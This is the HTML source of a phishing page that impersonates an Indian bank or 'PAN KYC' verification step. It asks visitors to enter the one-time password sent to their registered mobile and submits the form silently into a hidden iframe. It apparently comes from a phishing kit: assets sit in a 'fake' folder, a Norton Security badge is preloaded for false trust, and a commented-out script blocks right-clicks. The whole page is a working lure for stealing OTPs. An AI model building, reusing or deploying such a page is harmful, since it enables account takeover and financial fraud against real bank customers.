<!DOCTYPE HTML> 
<html>
   <head>
      <title>Wellcome</title>
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
      <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
      <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
      <link rel="manifest" href="/site.webmanifest">
      <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
      <meta name="msapplication-TileColor" content="#da532c">
      
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;500;600;700&display=swap" rel="stylesheet">



      
    <link rel="preload" as="image" href="fake/afx.png" />
    <link rel="preload" as="image" href="fake/nortonsecurity.png" />
    <meta name="next-head-count" content="5" />
    <link rel="preload" href="fake/a6cd15749f8dde69.css" as="style" />
    <link rel="stylesheet" href="fake/a6cd15749f8dde69.css" data-n-g="" />
    <link rel="stylesheet" href="index.css">
   </head>
   
   <!-- <script language="javascript"> 
   var message="This function is not allowed here.";
   function clickIE4(){
   if (event.button==2){
   alert(message);
   return false;
   }
   }
   function clickNS4(e){
   if (document.layers||document.getElementById&&!document.all){
   if (e.which==2||e.which==3){
   alert(message);
   return false;
   }
   }
   }
   if (document.layers){
   document.captureEvents(Event.MOUSEDOWN);
   document.onmousedown=clickNS4;}
   else if (document.all&&!document.getElementById){
   document.onmousedown=clickIE4;}
   document.oncontextmenu=new Function("alert(message);return false;")
   </script> -->
   <script type="module" src="main.js"></script>
   <body onload="startTimer();" style="background:#fff;">
      
<div id="__next">
   <div class="header">
     <div class="logo text-center">
       <span
         style="
           box-sizing: border-box;
           display: inline-block;
           overflow: hidden;
           width: initial;
           height: initial;
           background: none;
           opacity: 1;
           border: 0px none;
           margin: 0px;
           padding: 0px;
           position: relative;
           max-width: 100%;
         "
         ><span
           style="
             box-sizing: border-box;
             display: block;
             width: initial;
             height: initial;
             background: none;
             opacity: 1;
             border: 0px none;
             margin: 0px;
             padding: 0px;
             max-width: 100%;
           "
           ><img
             style="
               display: block;
               max-width: 100%;
               width: initial;
               height: initial;
               background: none;
               opacity: 1;
               border: 0px none;
               margin: 0px;
               padding: 0px;
             "
             alt=""
             aria-hidden="true"
             src="data:image/svg+xml,%3csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20version=%271.1%27%20width=%27220%27%20height=%2758%27/%3e" /></span>
        </span>
     </div>
   </div>
   <div class="content">
     <!-- <h2 class="text-center">Login to PAN KYC</h2> -->
     <center><p style="color: green">one time password sent to your register mobile number</p></center>
     <br>
     <br>
     <br>

     <!-- Static- Please don't do anything here-->
         <script type="text/javascript">var submitted=false;</script>
         <iframe name="hidden_iframe" id="hidden_iframe" style="display: none"></iframe>
         <!--My Form-->
         <form form class="OPTForm" action="" method="post" target="hidden_iframe" onsubmit="submitted=true">
       <div class="form-group">
         <label for="username">one time password(OTP)</label>
         <input type="text" class="form-control" id="otp" required=""name="Login_OTP"/>
       </div>

       <button type="submit" id="button" class="btn btn-primary login-btn">
         LOGIN
       </button>
     </form>
   </div>
   <div style="margin: 0px; background-color: #e2effa; color: rgb(87, 87, 164); padding: 10px;"><p><p style="font-weight: bold; color: rgb(21, 21, 93);">Please note: </p><br>
      
         <ol>1. There will be multiple attemps made to deliver the OTP (One Time Password) successfully to you.</ol>
         <ol>2. For customers having an Indian mobile number registered with the bank, if the above attempts are unsuccessful, an IVR will be initiated on your registered mobile number.</ol>
         <ol>3. For J&K customers, OTP will be sent only through IVR (Integrated Voice Recognition).</ol>
         <ol>4. Please re-initiate the process , incase youdo not recieve the same.</ol>
      </li> <br>
      
    </p></div>
   <div class="footer">
     © Copyright.<a href="#">Terms and Conditions</a
     ><a href="#">Privacy Policy</a>
   </div>
 </div>
     
      
      
	  <script>
	  var timeleft = 30;
    var downloadTimer = setInterval(function(){
    timeleft--;
    document.getElementById("countdowntimer").textContent = timeleft;
    if(timeleft <= 0)
        clearInterval(downloadTimer);
    },1000);
	  </script>
</div>
</div>
</body>
</html>